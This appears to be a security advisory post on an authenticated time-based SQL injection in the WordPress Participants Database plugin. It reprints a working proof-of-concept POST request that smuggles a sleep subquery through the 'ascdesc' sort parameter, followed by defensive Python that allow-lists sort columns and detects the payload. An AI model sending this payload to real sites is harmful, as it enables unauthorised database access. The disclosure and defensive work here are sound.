Participants Database < 1.9.5.6 – Authenticated Time Based SQL Injection

Feb 11, 2020 | Security - Internet, WordPress, and otherwise

Proof of Concept
From the original advisory (see references):

POST /wp-admin/admin.php?page=participants-database HTTP/1.1
Host: *redacted....cause*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /wp-admin/admin.php?page=participants-database
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
Connection: close
Cookie: *cookies were here*
Upgrade-Insecure-Requests: 1

action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=Sort
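The PoC works because the `ascdesc` (and `sortBy`) values of the `admin_list_filter` request end up in an ORDER BY clause. As an added example, not code from the advisory or from the plugin, the Python below allow-lists both parameters (the only safe way to handle identifiers, which cannot be bound as prepared-statement parameters) and reuses the PoC body as a constructed detection sample; the column names other than `date_updated` are assumptions.

```python
from urllib.parse import parse_qs

# Columns the list filter may legitimately sort by. `date_updated` comes from
# the PoC body; the remaining names are assumed for this example.
ALLOWED_SORT_COLUMNS = {"id", "date_recorded", "date_updated", "last_name"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def safe_order_by(body: str) -> str:
    """Build an ORDER BY clause from an admin_list_filter POST body.

    Identifiers are compared against fixed allow-lists and only the
    allow-listed literal is emitted, so user input is never concatenated
    into the SQL text.
    """
    params = parse_qs(body, keep_blank_values=True)
    sort_by = params.get("sortBy", ["id"])[0]
    direction = params.get("ascdesc", ["asc"])[0].lower()
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"rejected sortBy: {sort_by!r}")
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected ascdesc: {direction!r}")
    return f"ORDER BY `{sort_by}` {direction.upper()}"


def is_suspicious_sort(body: str) -> bool:
    """Detection helper for access or WAF logs: True when the sort
    parameters carry anything other than an allow-listed identifier
    (e.g. the PoC's `desc,(select*from(select(sleep(20)))a)`)."""
    try:
        safe_order_by(body)
        return False
    except ValueError:
        return True


# Constructed samples: a benign sort and the advisory's PoC body.
BENIGN = "action=admin_list_filter&sortBy=date_updated&ascdesc=desc&submit-button=Sort"
POC = ("action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE"
       "&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated"
       "&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=Sort")

if __name__ == "__main__":
    print(safe_order_by(BENIGN))    # ORDER BY `date_updated` DESC
    print(is_suspicious_sort(POC))  # True
```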

Source
